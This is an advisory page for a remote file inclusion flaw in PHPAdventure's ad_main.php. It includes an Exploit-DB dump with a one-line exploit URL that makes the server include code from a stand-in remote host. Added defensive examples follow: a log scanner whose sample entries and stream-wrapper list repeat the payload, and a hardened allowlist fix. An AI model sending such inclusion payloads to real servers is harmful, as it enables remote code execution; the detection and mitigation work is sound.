Vendor: PHPAdventure
By: D.O.M TEAM
CVSS: 8.8 (HIGH)
CWE: 94 (RFI)
Product Name: PHPAdventure
Affected Version From: All versions of PHPAdventure
Affected Version To: All versions of PHPAdventure
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2006

Discovered by: HER0

The vulnerability exists because user-supplied input reaching the '_mygamefile' parameter of the '/ad_main.php' script is passed to include() without any validation. The affected line is include($_mygamefile), and the script never initialises $_mygamefile itself: with PHP's register_globals enabled, the request parameter becomes that variable directly. A remote attacker can send an HTTP request whose '_mygamefile' value is a URL pointing at a file of PHP code under their control; where the PHP configuration permits URLs in include() (allow_url_fopen, and allow_url_include from PHP 5.2 onwards), that file is fetched, included and executed, giving arbitrary PHP code execution on the vulnerable system. Where remote URLs are disallowed, the same line still includes any local file the web server can read.
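As an added example (not from the advisory and not PHPAdventure code), the following PHP script flags web-server access-log entries that match the request shape described above: a request to ad_main.php whose '_mygamefile' value begins with a URL scheme or a PHP stream wrapper. The log lines, the function name and the set of prefixes are constructed for this example.

```php
<?php
// Added example, not part of the original advisory: flag access-log entries in
// which the '_mygamefile' parameter of ad_main.php carries a URL or PHP stream
// wrapper, i.e. the request shape the advisory's exploit line uses.
// The log lines below are constructed for the example.

declare(strict_types=1);

// Prefixes that turn include($var) into a remote or wrapper-based include.
const RFI_PREFIXES = ['http://', 'https://', 'ftp://', 'ftps://', 'php://', 'data:', 'expect://', 'phar://'];

/**
 * Return the offending '_mygamefile' value if the log line is an RFI attempt
 * against ad_main.php, or null otherwise.
 */
function rfi_indicator(string $logLine): ?string
{
    // Request line in Apache/Nginx combined format: "METHOD /path?query HTTP/x.y"
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[0-9.]+"/', $logLine, $m)) {
        return null;
    }
    $path  = parse_url($m[1], PHP_URL_PATH);
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($path) || basename($path) !== 'ad_main.php' || !is_string($query)) {
        return null;
    }
    parse_str($query, $params);            // also percent-decodes the value
    $value = $params['_mygamefile'] ?? null;
    if (!is_string($value)) {
        return null;
    }
    $trimmed = ltrim($value);
    foreach (RFI_PREFIXES as $prefix) {
        if (stripos($trimmed, $prefix) === 0) {   // case-insensitive: PHP://input also matches
            return $value;
        }
    }
    return null;
}

// Constructed sample log: two attempts against ad_main.php, two benign requests.
$sampleLog = [
    '203.0.113.7 - - [07/Nov/2006:10:15:02 +0000] "GET /ad_main.php?_mygamefile=http://evilcode.txt? HTTP/1.1" 200 512 "-" "curl"',
    '203.0.113.7 - - [07/Nov/2006:10:15:09 +0000] "GET /ad_main.php?_mygamefile=PHP://input HTTP/1.1" 200 512 "-" "curl"',
    '198.51.100.4 - - [07/Nov/2006:10:16:30 +0000] "GET /ad_main.php?_mygamefile=forest HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [07/Nov/2006:10:16:31 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

foreach ($sampleLog as $line) {
    $hit = rfi_indicator($line);
    if ($hit !== null) {
        echo "RFI attempt: _mygamefile=", $hit, PHP_EOL;
    }
}
```

Run with `php rfi_indicator.php`; the first two sample lines are reported, the last two are not. The prefix list is deliberately broader than the http:// payload in the advisory, since any include()-able wrapper gives the same result.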

Mitigation:

Never pass request data to include(), require() or their *_once variants. Treat the '_mygamefile' value as a lookup key into a fixed allowlist of game files (or validate it against a strict pattern such as a short alphanumeric identifier and resolve the result under a fixed directory), reject anything else, and read it from $_GET/$_POST explicitly rather than through register_globals. In php.ini, set register_globals=Off (the option was removed in PHP 5.4) and allow_url_include=Off (the default since PHP 5.2); with URL includes disabled the bug still allows local file inclusion, so the code change is required either way.
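The following is an added example of the hardened form, not PHPAdventure's own code: a replacement for the include($_mygamefile) line quoted in the advisory. The game names, file paths and the function name are assumptions made for the example.

```php
<?php
// Added example, not PHPAdventure's own code: a hardened replacement for the
// include($_mygamefile) line quoted in the advisory. The game names, file
// paths and the function name are assumptions made for the example.

declare(strict_types=1);

// Allowlist: the request value is only ever used as a key into this map, so
// the attacker never controls what string reaches include().
const GAME_FILES = [
    'forest' => 'games/forest.php',
    'castle' => 'games/castle.php',
];

/**
 * Map the untrusted '_mygamefile' value to a vetted, absolute path, or
 * return null when it must be refused.
 */
function resolve_game_file(string $requested, string $baseDir): ?string
{
    // Only short plain identifiers may even be looked up; this alone rejects
    // the advisory's payload (http://evilcode.txt?) and any ../ traversal.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, GAME_FILES)) {
        return null;
    }

    // Belt and braces: resolve symlinks and confirm the target is a regular
    // file that still lives under $baseDir.
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . GAME_FILES[$requested]);
    if ($base === false || $candidate === false || !is_file($candidate)) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Read the parameter explicitly instead of relying on register_globals, and
// refuse array-valued parameters (_mygamefile[]=...) outright.
$raw = $_GET['_mygamefile'] ?? '';
$requested = is_string($raw) ? $raw : '';
$file = resolve_game_file($requested, __DIR__);
if ($file === null) {
    http_response_code(400);
    exit('Unknown game file.');
}

$_stage = 1;
include $file;
```

The identifier check is what actually closes the hole; the realpath() confinement is defence in depth against a later edit that puts something unexpected into the allowlist. Because the allowlisted file must exist, a request for a legitimate name on a host without the games/ directory is also refused rather than passed to include().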
Source

Exploit-DB raw data:

*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contact: 16.her0@gmail.com
note: all the versions of PHPAdventure are affected.
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile); // $_mygamefile is never initialised here; with register_globals=On it comes straight from the request
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info

greetz: Sponge Bob, Bob esponja XDDDD...
******************************************************************************************

# milw0rm.com [2006-11-07]